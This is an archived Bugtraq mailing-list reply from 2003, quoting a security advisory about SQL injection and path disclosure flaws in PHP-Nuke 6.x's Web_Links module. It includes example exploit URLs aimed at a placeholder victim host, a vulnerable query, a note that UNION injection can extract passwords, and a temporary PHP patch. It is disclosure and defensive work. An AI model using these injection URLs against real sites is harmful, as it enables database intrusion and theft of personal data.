Bugtraq mailing list archives
Re: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!)
From: Rynho Zeros Web <hackargentino () gmx net>
Date: Tue, 13 May 2003 00:22:25 +0200 (MEST)
I have also discovered a Path Disclosure on PHP-Nuke 6.x, and others? Exploit: http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=[any_words] http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink If [ any_words ] has a nonnumerical value or a NULL value, this will produce "path disclosure". In addition to this form, since Ripe has informed, a SQL Injection can be made. Patch (this is a temporal patches, but... is running) In the viewlink function insert the following thing: ------------------------[ CODE ]------------------------ if(!isset($cid) || $cid == NULL || $cid == "" || !is_numeric ($cid)) { echo "I don't like you >:|"; exit(); } ------------------------[ CODE ]------------------------ ------ XyborG ------ Thanks to Verstand & Chiz0
/-----------------------------------------------------------------------------\
| 7 A 6 9 - A d v C: 010
|-----------------------------------------------------------------------------|
| | [ PHP-Nuke SQL injection ] |
\-----------------------------------------------------------------------------/
|
11/05/2003 |
\------------/
Data.
------
+ Type: SQL injection.
+ Software: PHP-Nuke
+ Versions: 6.x (including 6.5) y 5.x
+ Exploit: Yes
+ Author: Albert Puigsech Galicia
+ Contact: ripe () 7a69ezine org
Introduction.
-------------
PhpNuke is a well known content management system programed
in PHP by Francisco Bucci, a lot of people use it because it is very
easy to install and manage.
Description.
------------
Web_Links module, included on PHP-Nuke base package, has multiple
SQL injection (more than 20). The web user may be able to insert his own
SQL code in most of the numeric values included in querys, because the
plugin coder didn't use inverted comas.
Explotation.
------------
If the SQL agent allow us to use an UNION sentence (like MySQL 4
does) it is possible to extract information about anything inside the
database, of course this includes passwords, personal data, etc.
Otherwise,
without UNION posibility we can't access to other SQL tables that web
links
management, so the only posiblity is to play with hits and votes.
Some examples:
[*] On viewlink function:
$result = sql_query("select title,parentid from
".$prefix."_links_categories where cid=$cid", $dbi);
http://victim/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%20<our_code>
[*] Vim index.php... There are a lot.
Patch.
-------
There is no patch for this vulnerability. But is easy to add
inverted
comas on all numeric values.
Notes.
------
I realy sorprised about PHP-Nuke usage. I can't understand that a
software with PHP-Nuke's security historial may be used. Lot of
vulnerabilty have been discovered on this software in last months, and
there
are more bug. Recomandation for PHP-Nuke users: Migrate!
--
---------------------------
Albert Puigsech Galicia
http://ripe.7a69ezine.org
---------------------------
-- XyBØrG WebMaster de: www.RZWEB.com.ar Powered By Dattatec.Com +++ GMX - Mail, Messaging & more http://www.gmx.net +++ Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
Current thread:
- Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!) Albert Puigsech Galicia (May 12)
- Re: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!) Rynho Zeros Web (May 13)
- Re[2]: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!) Benjamin Schulz (May 15)
- Re: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!) Rynho Zeros Web (May 13)